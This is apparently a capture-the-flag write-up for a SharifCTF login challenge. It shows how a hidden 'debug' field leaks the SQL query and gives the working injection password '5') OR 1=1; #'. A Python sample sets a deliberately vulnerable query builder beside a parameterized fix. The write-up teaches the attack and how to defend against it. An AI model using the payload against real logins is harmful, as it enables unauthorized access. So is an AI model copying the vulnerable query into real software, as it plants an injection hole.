Another SharifCTF challenge, called hidden input.

  • Category: Forensics
  • Points: 50
Login if you can :)


At first we are presented with a simple webpage containing 2 inputs - login and password.

<!DOCTYPE html>
	<link href='fonts.css' rel='stylesheet' type='text/css'>
	<link rel="stylesheet" type="text/css" href="asset/style.css">
	<div class="logo"><div class="lspan">SharifCTF</div></div>
	<form method="POST" action="login.php">
		<div class="login-block">
			<input type="text" value="" placeholder="Username" id="Username" name="Username"/>
			<input type="password" value="" placeholder="Password" id="Password" name="Password"/>
			<input type="hidden" name="debug" id="debug" value="0">

But upon inspecting the source code, we can see a hidden input called debug. After changing its value to 1 and logging in, we see the whole SQL query in addition to the login failed message.

username: admin
password: asd
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('asd')

Let’s construct a simple SQL injection to get into the webpage. First, we put some value into the password variable, then add ') to close the opening quotation mark and parenthesis, and finally append the SQL that tricks the query: OR 1=1;. The last step is to comment out the leftover characters of the original query with #.

username: admin
password: 5') OR 1=1; #
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('5') OR 1=1; #')
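
The same query shape next to a parameterized version, as an added example that is not code from the challenge (the real backend is login.php; Python and SQLite are used here so it runs offline). The table contents, the function names and the stored password are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample table; the real schema is not shown in the write-up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def build_vulnerable_query(username, password):
    # Same shape as the query leaked by debug=1: input is pasted into the SQL text.
    return ("SELECT * FROM users WHERE username=('" + username +
            "') AND password=('" + password + "')")

def login_vulnerable(db, username, password):
    query = build_vulnerable_query(username, password)
    # MySQL ends the statement at ';' and ignores '#...' as a comment. SQLite has
    # no '#' comments, so keep the text up to the first ';' to mimic that behaviour.
    statement = query.split(";")[0]
    # AND binds tighter than OR, so "... AND password=('5') OR 1=1" matches every row.
    return db.execute(statement).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders keep the input as data: quotes and parentheses are never parsed
    # as SQL. Plaintext comparison only mirrors the write-up's query; a real
    # system would verify a password hash instead.
    row = db.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

def handle_login(db, form):
    # Hardened handler: the client-supplied 'debug' field is never read,
    # so the response cannot include the SQL text.
    ok = login_parameterized(db, form.get("Username", ""), form.get("Password", ""))
    return {"ok": ok, "message": "Welcome" if ok else "Login failed"}

if __name__ == "__main__":
    db = make_db()
    payload = "5') OR 1=1; #"  # password value from the write-up
    print(build_vulnerable_query("admin", payload))
    print("vulnerable login:", login_vulnerable(db, "admin", payload))
    print("parameterized login:", login_parameterized(db, "admin", payload))
    print(handle_login(db, {"Username": "admin", "Password": payload, "debug": "1"}))
```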


No external tools used